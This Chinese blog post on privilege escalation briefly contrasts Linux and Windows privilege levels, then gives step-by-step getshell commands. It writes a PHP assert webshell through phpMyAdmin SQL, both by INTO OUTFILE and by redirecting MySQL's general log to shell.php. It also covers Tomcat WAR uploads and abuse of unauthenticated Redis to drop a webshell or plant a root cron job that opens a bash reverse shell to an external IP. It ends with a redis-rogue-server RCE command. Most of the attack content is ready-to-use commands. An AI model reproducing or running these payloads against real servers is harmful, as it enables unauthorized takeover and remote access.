首页 > 其他分享 >权限提升(1)

权限提升(1)

时间:2023-03-02 15:24:01浏览次数:21  
标签:语句 set 写入 提升 SQL 日志 权限

权限划分

Linux

管理员UID为0:系统的管理员用户。

系统用户UID为1~999:Linux系统为了避免因某个服务程序出现漏洞而被黑客提权至整台服务器,默认服务程序会由独立的系统用户负责运行,进而有效控制被破坏范围。

普通用户UID从1000开始:是由管理员创建的用于日常工作的用户。

Windows

用户及组:system administrator user guest等

权限大小从左到右

 

linux的root等于windows的system

UID在1~999等于windows的adminstrator

UID在1000+ 普通用户权限

为什么要提升系统权限

phpstudy是本地集成软件他有和安装软件的管理员一样的权限

而远程的权限很小,所以要提升系统权限,才可以进行后续的域控权限提升

jsp 远程直接是root、system权限 因为这是java的特性 所以就不用再进行系统权限的提升

 

第三方应用-Phpmyadmin后台Getshell操作

phpmyadmin 用于操作数据库

找到phpmyadmin-->登录phpmyadmin-->用sql语句上传后门代码

低版本mysql

  • mysql如果低于5.0可以直接用outfile写入:

SELECT "<?php @assert($_REQUEST["admin"]);?>" INTO OUTFILE

高版本mysql

secure防护利用日志记录保存后门

 

  • 通过以下SQL语句可以查询secure_file_priv(secure-file-priv是全局变量,指定文件夹作为导出文件存放的地方,这个值是只读的)是否为null

show variables like '%secure%'

  • 通过以下SQL语句可以查询到日志保存状态(ON代表开启 OFF代表关闭) & 日志的保存路径

show variables like '%general%'

  • 通过以下SQL语句修改general_log的值,开启日志保存

set global general_log='on';

  • 通过以下SQL语句修改日志保存的路径(general_log_file值)

SET global general_log_file='<网站绝对路径>/shell.php'

  • 再次执行以下SQL语句,查询是否成功更改

show variables like '%general%'

  • 执行以下SQL语句,以下SQL语句将会被写入到日志文件(shell.php)中

SELECT '<?php @assert($_REQUEST["admin"]);?>';

  • 最后通过url访问

系统后台Getshell操作

利用后台已有功能点进行获取:SQL执行,文件上传,模版修改,外部引用等

 

可以上传jsp、aspx等等webshell

也可以查后台的cms

 

Web容器中间件-Tomcat平台后台Getshell操作

上传WAR包自动解析部署-JSP压缩ZIP后修改WAR后缀

 

数据库服务类-Redis未授权管理终端Getshell操作

启动环境:/opt/redis-2.8.17# redis-server /etc/redis.conf

1.Webshell写入:

config set dir /home/wwwroot/default #设置WEB写入目录

config set dbfilename test.php #设置写入文件名

set test "<?php phpinfo();?>" #设置写入文件代码

bgsave #保存执行

save  #保存执行

一条一条执行

计划任务反弹shell

config set dir /var/spool/cron/crontabs #设置写入计划任务目录

config set dbfilename root #设置写入文件名

set xx "\n\n\n* * * * * bash -i >& /dev/tcp/47.75.212.155/3333 0>&1\n\n\n" #设置写入文件代码

save #保存执行

Redis RCE反弹shell

https://github.com/n0b0dyCN/redis-rogue-server

python redis-rogue-server.py --rhost=47.94.236.117 --lhost=47.75.212.155 --exp=exp.so

标签:语句,set,写入,提升,SQL,日志,权限
From: https://www.cnblogs.com/Map1eaf/p/17171867.html

相关文章

  • 极光笔记 | 极光PUSH服务助力企业提升抢单速度
    随着硬件、软件、网络等不断发展、完善,互联网已经渗透到了日常生活中的方方面面,在直接赋能原有行业服务的同时也带来了很多新的服务模式,给人们日常生活带来了极大便利。例......
  • 安卓权限
    前言在很久以前,即Android6.0(API23)得时候。应用的权限只要你在AndroidManifest.xml文件中注册权限,安装时则会全部授予,需要的时候自动唤起授权弹窗询问用户。但后......
  • 使用手工特征提升模型性能
    本文将使用信用违约数据集介绍手工特征的概念和创建过程。通过对原始数据进行手工的特征工程,我们可以将模型的准确性和性能提升到新的水平,为更精确的预测和更明智的业务决......
  • KEENZY中科易安|公租房智能门锁提升保障房服务水平
    近年来,广西多地依托中科易安公租房智能门锁、保障房管理系统开展智慧公租房项目,切实提升了物业管理服务水平以及住户出行体验。 中科易安基于公租房打造的数智化通行解决......
  • KCL v0.4.5 发布 - 更好的编写便利性改进,稳定性,体验提升与多平台支持
    简介KCL团队很高兴地宣布KCLv0.4.5版本现在已经可用!本次发布主要为KCL语言编写便利性和稳定性提升,错误信息改进以及更多平台包括windows版本支持以及更多下载方式......
  • 如何将BI 工具与业务系统进行单点登录对接,实现用户权限通用
    首先来看下两套系统的用户体系功能,左边是BI工具,右边是业务系统,需要实现用户权限对接和打通:单点登录体系及用户场景• 场景1.用户登录WynBI页面使用第三方业务系统......
  • MySQL权限管理
    权限管理概念可以限制用户访问哪些库、哪些表可以限制用户对哪些表执行SELECT、CREATE、DELETE、DELETE、ALTER等操作可以限制用户登录的IP或域名可以限制用户自己......
  • 微信小程序设置动态tabBar,根据用户权限变化
    1、微信小程序配置自定义tab-bar​......
  • 速来~与 Werner Vogels 博士一起探索敏捷性与创新速度一起提升的秘方
    AmazonWebServices的现代应用程序创新一直是Amazon公司坚持追求的核心目标。约20年前,我们经历了一次彻底的转型,旨在建立起“发明、发布、再发明、再发布、重新开始、......
  • 继承权限
    类的继承的权限有三种:私有,保护和公有从访问对象的角度来说一共包含三类访问对象:类的实例友元函数和友元类类的成员函数针对这三种访问对象我们较为清晰分出继承的访......